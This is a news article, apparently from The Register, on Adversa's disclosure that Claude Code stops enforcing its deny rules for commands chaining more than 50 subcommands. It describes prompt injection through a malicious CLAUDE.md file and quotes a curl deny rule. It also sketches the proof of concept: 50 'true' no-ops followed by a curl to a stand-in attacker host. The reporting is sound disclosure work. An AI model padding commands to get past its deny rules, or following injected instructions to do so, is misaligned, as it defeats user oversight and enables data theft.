Claude Code bypasses safety rule if given too many commands

The Register / 4/2/2026


Key Points

  • The article reports that Claude Code can bypass its safety/deny-rule enforcement when an input contains “too many” commands, because a hard-coded limit causes automatic rule checks to drop for concatenated instructions.
  • It describes the underlying mechanism as a safety-policy enforcement cap that fails under specific command packaging, effectively weakening the intended guardrails.
  • The issue is framed as an implementation flaw in how deny rules are applied at runtime, rather than a general breakdown of model understanding.
  • The report highlights the risk that safety controls relying on rule enforcement can be vulnerable to prompt/command-formatting edge cases, especially in agentic tooling workflows.


A hard-coded limit on deny rules drops automatic enforcement for concatenated commands

Wed 1 Apr 2026 // 20:51 UTC

Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. This vuln leaves the bot open to prompt injection attacks.

Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code's source.

Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of those tools, like curl, which makes network requests from the command line, might pose a security risk if invoked by an over-permissive AI model.

One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl via ~/.claude/settings.json, you'd add something like { "deny": ["Bash(curl:*)"] }.
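Spelled out as a complete settings file, that deny rule sits under a permissions block, something like the following (the nesting shown here follows Anthropic's published settings documentation; treat the exact schema as subject to change):

```json
{
  "permissions": {
    "deny": ["Bash(curl:*)"]
  }
}
```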

But deny rules have limits. The source code file bashPermissions.ts contains a comment referencing an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on the number of subcommands subjected to automatic security checks, set by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. Beyond 50, the agent stops checking and falls back to asking the user for permission. The comment explains that 50 is a generous allowance for legitimate usage.
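The described failure mode can be sketched like so. This is a minimal reconstruction of the behavior the report describes, not Anthropic's actual bashPermissions.ts; everything here beyond the MAX_SUBCOMMANDS_FOR_SECURITY_CHECK name is invented for illustration:

```typescript
// Sketch of the enforcement gap as described; names other than the cap
// constant are hypothetical.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

type Decision = "deny" | "ask" | "allow";

function checkBashCommand(subcommands: string[], denyPrefixes: string[]): Decision {
  // Per CC-643 as described: past the cap, automatic deny-rule checks
  // are skipped entirely and the agent falls back to asking the user.
  if (subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    return "ask";
  }
  for (const sub of subcommands) {
    if (denyPrefixes.some((prefix) => sub.trim().startsWith(prefix))) {
      return "deny";
    }
  }
  return "allow";
}
```

Under this shape, a short command hitting a deny rule is blocked, but the same denied command hidden at position 51 merely triggers a permission prompt.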

"The assumption was correct for human-authored commands," the Adversa AI Red Team said in a writeup provided to The Register. "But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process."

The Adversa team's proof-of-concept attack was simple. They created a bash command that combined 50 no-op "true" subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.
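The shape of that proof of concept can be reconstructed as follows (a hypothetical rendering, not Adversa's exact payload, with a made-up attacker URL):

```typescript
// 50 harmless "true" subcommands chained ahead of the command the deny
// rule should have blocked.
const padding = Array.from({ length: 50 }, () => "true").join(" && ");
const poc = `${padding} && curl https://attacker.example/payload`;

// 51 subcommands in total: one past the reported cap of 50, so automatic
// deny-rule checks are skipped and the agent asks instead of denying.
const subcommandCount = poc.split("&&").length;
console.log(subcommandCount); // 51
```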

In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But often developers grant automatic approval to agents (--dangerously-skip-permissions mode) or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode.

Ironically, Anthropic appears to already have a fix – a more robust command parser, based on the open source tree-sitter parsing library, that's also evident in its source code and available internally, but not in public builds.

Adversa argues that this is a bug in the security policy enforcement code, one that has regulatory and compliance implications if not addressed.

A fix would be easy. Anthropic already has the tree-sitter-based parser working internally, and a simple one-line change – switching the "behavior" key from "ask" to "deny" at line 2174 of bashPermissions.ts – would address this particular vulnerability.

Anthropic did not immediately respond to a request for comment. ®
